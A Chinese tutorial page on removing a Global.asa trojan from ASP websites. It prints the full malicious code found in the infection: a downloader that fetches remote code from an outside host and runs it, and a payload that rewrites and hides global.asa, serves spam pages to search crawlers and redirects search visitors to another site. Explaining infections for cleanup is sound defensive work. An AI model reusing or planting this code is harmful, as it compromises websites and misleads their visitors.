网站中Global.asa木马的快速清除方法_病毒查杀教程-查字典教程网
网站中Global.asa木马的快速清除方法
网站中Global.asa木马的快速清除方法
发布时间:2016-12-21 来源:查字典编辑
摘要:解决办法:1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:/softs/12771.html2、如果这...

解决办法:

1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:/softs/12771.html

2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示:

3、关闭服务器上的缩略图功能 方法参考 /os/windows/Win2003/34960.html

根源:

这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码:

复制代码代码如下:

<%

'by*aming

Function Gethtml(url)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

Gethtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write Gethtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

Gethtml = objStream.ReadText

objStream.Close

set objStream=Nothing

End Function

execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))

%>

清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示!

xmlasaquan.txt的内容如下:

复制代码代码如下:

'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>

'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.1.2('3:4');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>

'by*aming

Server.ScriptTimeout=600

Public Function createasa(ByVal Content)

On Error Resume Next

Set fso = Server.CreateObject("scripting.filesystemobject")

set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))

f.Attributes=0

Set Obj = Server.CreateObject("adod" & "b.S" & "tream")

Obj.Type = 2

Obj.open

Obj.Charset = "gb2312"

Obj.Position = Obj.Size

Obj.writetext = Content

Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2

Obj.Close

Set Obj = Nothing

f.Attributes=1+2+4

set f=Nothing

Set fso = Nothing

End Function

Public Function GetHtml(url)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

GetHtml = objStream.ReadText

objStream.Close

End Function

Function check(user_agent)

allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")

check_agent=false

For agenti=lbound(allow_agent) to ubound(allow_agent)

If instr(user_agent,allow_agent(agenti))>0 then

check_agent=true

exit for

end if

Next

check=check_agent

End function

Function CheckRobot()

CheckRobot = False

Dim Botlist,i,Repls

Repls = request.ServerVariables("http_user_agent")

Krobotlist = "Baiduspider|Googlebot"

Botlist = Split(Krobotlist,"|")

For i = 0 To Ubound(Botlist)

If InStr(Repls,Botlist(i)) > 0 Then

CheckRobot = True

Exit For

End If

Next

If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1

If Session("ThisCheckRobot") = 1 Then CheckRobot = True

End Function

Function CheckRefresh()

CheckRefresh = False

Dim Botlist,i,Repls

Krobotlist = "baidu|google|sogou|soso|youdao"

Botlist = Split(Krobotlist,"|")

For i = 0 To Ubound(Botlist)

If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then

CheckRefresh = True

Exit For

End If

Next

End Function

Sub sleep()

If response.IsClientConnected=true then

Response.Flush

else

response.end

end if

End Sub

If CheckRefresh=true Then

cnnbd=lcase(request.servervariables("HTTP_HOST"))

response.redirect("http://www.82767.com/?"&cnnbd&"")

'Response.Write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#FF0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")

response.end

end If

user_agent=Request.ServerVariables("HTTP_USER_AGENT")

if check(user_agent)=true then

body=GetHtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")

response.write body

response.end

else

asa=GetHtml("http://www.pornhome.com/dy7749/codequan.txt")

if instr(asa,"by*aming")>0 then

createasa(asa)

end if

ScriptAddress=Request.ServerVariables("SCRIPT_NAME")

namepath=Server.MapPath(ScriptAddress)

If Len(Request.QueryString) > 0 Then

ScriptAddress = ScriptAddress & "?" & Request.QueryString

end if

geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress

geturl =LCase(geturl)

'response.write replace(namepath,server.MapPath("/"),"")

'response.end

'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and

if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then

agent = lcase(request.servervariables("http_user_agent"))

referer = LCase(Request.ServerVariables("HTTP_REFERER"))

bot = ""

Amll = ""

if instr(agent, "+") > 0 then bot = agent

if instr(agent, "-") > 0 then bot = agent

if instr(agent, "http") > 0 then bot = agent

if instr(agent, "spider") > 0 then bot = agent

if instr(agent, "bot") > 0 then bot = agent

if instr(agent, "linux") > 0 then bot = agent

if instr(agent, "baidu") > 0 then bot = agent

if instr(agent, "google") > 0 then bot = "nobot"

if instr(agent, "yahoo") > 0 then bot = "nobot"

if instr(agent, "msn") > 0 then bot = "nobot"

if instr(agent, "alexa") > 0 then bot = "nobot"

if instr(agent, "sogou") > 0 then bot = "nobot"

if instr(agent, "youdao") > 0 then bot = "nobot"

if instr(agent, "soso") > 0 then bot = "nobot"

if instr(agent, "iask") > 0 then bot = "nobot"

if bot="nobot" then

'Call WriteErr

'response.end

end if

Call sleep()

end if

end if

'</body></html>

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新病毒查杀学习
    热门病毒查杀学习
    网络安全子分类